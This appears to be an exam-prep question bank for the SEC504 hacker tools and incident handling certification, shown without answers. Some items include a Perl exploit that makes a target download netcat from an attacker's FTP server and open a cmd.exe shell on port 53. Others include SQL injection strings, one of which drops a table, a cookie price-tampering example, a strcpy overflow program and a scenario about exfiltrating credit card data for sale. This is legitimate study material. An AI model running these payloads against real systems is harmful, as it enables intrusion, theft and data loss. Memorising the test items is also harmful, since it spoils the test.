SEC504 Hacker Tools, Techniques, Exploits and Incident Handling Questions and Answers

Which of the following is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, Bulletin board systems, and fax machines?

John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as a username and successfully logs on to the user page of the Web site. Now, John asks the we-aresecure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are-secure Website login page from the SQL injection attack?

Adam works as a Network Administrator for PassGuide Inc. He wants to prevent the network from DOS attacks. Which of the following is most useful against DOS attacks?

You work as a Network Administrator for Marioxnet Inc. You have the responsibility of handling two routers with BGP protocol for the enterprise's network. One of the two routers gets flooded with an unexpected number of data packets, while the other router starves with no packets reaching it. Which of the following attacks can be a potential cause of this?

Which of the following characters will you use to check whether an application is vulnerable to an SQL injection attack?

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#####################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host –C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.

Which of the following are the two popular types of buffer overflows?

Each correct answer represents a complete solution. Choose two.

James works as a Database Administrator for Techsoft Inc. The company has a SQL Server 2005 computer. The computer has a database named Sales. Users complain that the performance of the database has deteriorated. James opens the System Monitor tool and finds that there is an increase in network traffic. What kind of attack might be the cause of the performance deterioration?

Which of the following statements are true about worms?

Each correct answer represents a complete solution. Choose all that apply.

Andrew, a bachelor student of Faulkner University, creates a gmail account. He uses 'Faulkner' as the password for the gmail account. After a few days, he starts receiving a lot of e-mails stating that his gmail account has been hacked. He also finds that some of his important mails have been deleted by someone. Which of the following methods has the attacker used to crack Andrew's password?

Each correct answer represents a complete solution. Choose all that apply.

Which of the following programming languages are NOT vulnerable to buffer overflow attacks?

Each correct answer represents a complete solution. Choose two.

John visits an online shop that stores the IDs and prices of the items to buy in a cookie. After selecting the items that he wants to buy, the attacker changes the price of the item to 1.

Original cookie values:

ItemID1=2

ItemPrice1=900

ItemID2=1

ItemPrice2=200

Modified cookie values:

ItemID1=2

ItemPrice1=1

ItemID2=1

ItemPrice2=1

Now, he clicks the Buy button, and the prices are sent to the server that calculates the total price.

Which of the following hacking techniques is John performing?

Which of the following terms describes an attempt to transfer DNS zone data?

Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?

Which of the following functions can you use to mitigate a command injection attack?

Each correct answer represents a part of the solution. Choose all that apply.

Which of the following are countermeasures to prevent unauthorized database access attacks?

Each correct answer represents a complete solution. Choose all that apply.

Which of the following penetration testing phases involves reconnaissance or data gathering?

Which of the following statements about a Trojan horse are true?

Each correct answer represents a complete solution. Choose two.

Which of the following refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system?

You check performance logs and note that there has been a recent dramatic increase in the amount of broadcast traffic. What is this most likely to be an indicator of?

Which of the following functions in c/c++ can be the cause of buffer overflow?

Each correct answer represents a complete solution. Choose two.

In which of the following steps of the incident handling processes does the Incident Handler make sure that all business processes and functions are back to normal and then also wants to monitor the system or processes to ensure that the system is not compromised again?

Victor works as a professional Ethical Hacker for SecureEnet Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task:

1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs.

2. Reducing noise by adjusting color and averaging pixel value.

3. Sharpening, Rotating, Resampling, and Softening the image.

Which of the following Steganography attacks is Victor using?

You work as a System Engineer for Cyber World Inc. Your company has a single Active Directory domain. All servers in the domain run Windows Server 2008. The Microsoft Hyper-V server role has been installed on one of the servers, namely uC1. uC1 hosts twelve virtual machines. You have been given the task to configure the Shutdown option for uC1, so that each virtual machine shuts down before the main Hyper-V server shuts down. Which of the following actions will you perform to accomplish the task?

Adam, a novice web user, is very conscious about the security. He wants to visit the Web site that is known to have malicious applets and code. Adam always makes use of a basic Web Browser to perform such testing.

Which of the following web browsers can adequately fill this purpose?

Which of the following statements are true about Dsniff?

Each correct answer represents a complete solution. Choose two.

Adam is a novice Web user. He chooses a 22 letters long word from the dictionary as his password.

How long will it take to crack the password by an attacker?

You want to integrate the Nikto tool with nessus vulnerability scanner. Which of the following steps will you take to accomplish the task?

Each correct answer represents a complete solution. Choose two.

Which of the following steps can be taken as countermeasures against sniffer attacks?

Each correct answer represents a complete solution. Choose all that apply.

You are the Security Consultant and have been hired to check security for a client's network. Your client has stated that he has many concerns but the most critical is the security of Web applications on their Web server. What should be your highest priority then in checking his network?

You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are working as a root user on the Linux operating system. Your company is facing an IP spoofing attack.

Which of the following tools will you use to get an alert saying that an upcoming IP packet is being spoofed?

John works as a C programmer. He develops the following C program:

#include

#include

#include

int buffer(char *str) {

char buffer1[10];

strcpy(buffer1, str);

return 1;

}

int main(int argc, char *argv[]) {

buffer (argv[1]);

printf("Executed\n");

return 1;

}

His program is vulnerable to a __________ attack.

Which of the following rootkits adds additional code or replaces portions of an operating system, including both the kernel and associated device drivers?

Which of the following virus is a script that attaches itself to a file or template?

Which of the following types of attacks come under the category of hacker attacks?

Each correct answer represents a complete solution. Choose all that apply.

Which of the following is the Web 2.0 programming methodology that is used to create Web pages that are dynamic and interactive?

Which of the following programs is used for bypassing normal authentication for securing remote access to a computer?

You want to use PGP files for steganography. Which of the following tools will you use to accomplish the task?

In which of the following attacks does an attacker use packet sniffing to read network traffic between two parties to steal the session cookie?

You want to connect to your friend's computer and run a Trojan on it. Which of the following tools will you use to accomplish the task?

John used to work as a Network Administrator for We-are-secure Inc. Now he has resigned from the company for personal reasons. He wants to send out some secret information of the company. To do so, he takes an image file and simply uses a tool image hide and embeds the secret file within an image file of the famous actress, Jennifer Lopez, and sends it to his Yahoo mail id. Since he is using the image file to send the data, the mail server of his company is unable to filter this mail. Which of the following techniques is he performing to accomplish his task?

You work as a Network Penetration tester in the Secure Inc. Your company takes the projects to test the security of various companies. Recently, Secure Inc. has assigned you a project to test the security of a Web site. You go to the Web site login page and you run the following SQL query:

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'attacker@somehwere.com'; DROP TABLE members; --'

What task will the above SQL query perform?

Which of the following protocols is a maintenance protocol and is normally considered a part of the IP layer, but has also been used to conduct denial-of-service attacks?

You work as a professional Ethical Hacker. You are assigned a project to test the security of www.weare- secure.com. You somehow enter in we-are-secure Inc. main server, which is Windows based.

While you are installing the NetCat tool as a backdoor in the we-are-secure server, you see the file credit.dat having the list of credit card numbers of the company's employees. You want to transfer the credit.dat file in your local computer so that you can sell that information on the internet in the good price. However, you do not want to send the contents of this file in the clear text format since you do not want that the Network Administrator of the we-are-secure Inc. can get any clue of the hacking attempt. Hence, you decide to send the content of the credit.dat file in the encrypted format.

What steps should you take to accomplish the task?

Which of the following is the method of hiding data within another media type such as graphic or document?

Which of the following procedures is designed to enable security personnel to identify, mitigate, and recover from malicious computer incidents, such as unauthorized access to a system or data, denialof-service, or unauthorized changes to system hardware, software, or data?